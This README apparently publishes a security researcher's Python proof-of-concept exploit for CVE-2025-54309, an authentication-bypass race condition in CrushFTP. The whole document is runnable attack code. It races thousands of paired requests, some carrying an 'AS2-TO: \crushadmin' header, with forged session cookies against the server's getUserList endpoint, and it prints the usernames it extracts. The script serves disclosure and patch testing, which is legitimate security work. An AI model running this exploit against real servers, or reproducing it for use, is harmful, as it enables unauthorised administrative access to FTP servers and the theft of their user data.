README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
import sys
import random
import string
banner = """ __ ___ ___________
__ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________
\\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\
\\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/
\\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__|
\\/ \\/ \\/
watchTowr-vs-CrushFTP-CVE-2025-54309.py
(*) CrushFTP Authentication Bypass Race Condition PoC
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-54309]
"""
helptext = """
Example Usage:
- python watchTowr-vs-CrushFTP-CVE-2025-54309.py http://localhost:8082
"""
# Generate random 4-character c2f value
def generate_random_c2f():
return ''.join(random.choices(string.ascii_letters + string.digits, k=4))
# Global variables for c2f and cookie management
C2F_VALUE = None
CRUSH_AUTH_COOKIE = None
def update_c2f_and_cookies():
"""Generate new c2f value and update cookies"""
global C2F_VALUE, CRUSH_AUTH_COOKIE
C2F_VALUE = generate_random_c2f()
CRUSH_AUTH_COOKIE = f"CrushAuth=1755657772315_Nr7FSH4jd2l6RueteEaaEDpY1CcdU{C2F_VALUE}; currentAuth={C2F_VALUE}"
print(f"[*] Generated new c2f value: {C2F_VALUE}")
# Initialize first c2f value
update_c2f_and_cookies()
def make_request_with_as2(target_url):
"""Make request with AS2-TO header and disposition-notification content type"""
url = f"{target_url}/WebInterface/function/"
headers = {
"Host": target_url.replace("http://", "").replace("https://", ""),
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "keep-alive",
"AS2-TO": "\crushadmin",
"Content-Type": "disposition-notification",
"X-Requested-With": "XMLHttpRequest",
"Cookie": CRUSH_AUTH_COOKIE
}
data = {
"command": "getUserList",
"serverGroup":"MainUsers",
"c2f": C2F_VALUE
}
try:
response = requests.post(url, headers=headers, data=data, verify=False, timeout=5)
return f"AS2 Request - Status: {response.status_code}", response.text
except Exception as e:
return f"AS2 Request - Error: {str(e)}", ""
def make_request_without_as2(target_url):
"""Make request without AS2-TO header and disposition-notification content type"""
url = f"{target_url}/WebInterface/function/"
headers = {
"Host": target_url.replace("http://", "").replace("https://", ""),
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Cookie": CRUSH_AUTH_COOKIE
}
data = {
"command": "getUserList",
"serverGroup":"MainUsers",
"c2f": C2F_VALUE
}
try:
response = requests.post(url, headers=headers, data=data, verify=False, timeout=5)
return f"Regular Request - Status: {response.status_code}", response.text
except Exception as e:
return f"Regular Request - Error: {str(e)}", ""
def check_vulnerable_response(response_text):
"""Check if response contains user_list_subitem pattern and extract usernames"""
if "<user_list_subitem>" in response_text:
# Extract all usernames from user_list_subitem tags
import re
usernames = re.findall(r'<user_list_subitem>(.*?)</user_list_subitem>', response_text)
if usernames:
# Limit to top 10 users
top_users = usernames[:10]
print(f"[*] EXFILTRATED {len(top_users)} USERS: {', '.join(top_users)}")
return True
return False
def race_requests_with_detection(target_url, num_requests=1000):
"""Race multiple requests and detect vulnerability"""
print(f"Starting race with {num_requests} request pairs...")
print("=" * 60)
for i in range(num_requests):
# Generate new c2f every 100 requests
if i % 50 == 0:
update_c2f_and_cookies()
print(f"[*] NEW SESSION: c2f={C2F_VALUE}")
# Store results
results = {'as2': None, 'regular': None}
def as2_worker():
results['as2'] = make_request_with_as2(target_url)
def regular_worker():
results['regular'] = make_request_without_as2(target_url)
# Create and start threads
t1 = threading.Thread(target=as2_worker)
t2 = threading.Thread(target=regular_worker)
# Start both threads simultaneously
t1.start()
t2.start()
# Wait for both to complete
t1.join()
t2.join()
# Check for vulnerability in both responses
as2_status, as2_response = results['as2']
regular_status, regular_response = results['regular']
# Check if either response contains the user list pattern
if check_vulnerable_response(as2_response) or check_vulnerable_response(regular_response):
print("[*] VULNERABLE! RACE CONDITION POSSIBLE!")
return True
# Print progress every 100 requests
if (i + 1) % 50 == 0:
print(f"[*] PROGRESS: {i + 1}/{num_requests} request pairs completed...")
return False
def poc_attempt(target_url):
"""Main POC function with retry logic"""
total_requests = 5000
print("[*] CRUSHFTP RACE CONDITION POC")
print(f"[*] TARGET: {target_url}")
print("[*] ENDPOINT: CrushFTP WebInterface getUserList")
print(f"[*] ATTACK: {total_requests} requests with new c2f every 50 requests")
print("=" * 60)
# Try 5000 requests with new c2f every 50
if race_requests_with_detection(target_url, total_requests):
return True
print("[*] POC FAILED: Target appears to be patched or timing window missed")
return False
if __name__ == "__main__":
print(banner)
if len(sys.argv) != 2:
print(helptext)
sys.exit(1)
target_url = sys.argv[1]
# Validate URL format
if not target_url.startswith(('http://', 'https://')):
print("[*] Error: URL must start with http:// or https://")
sys.exit(1)
poc_attempt(target_url)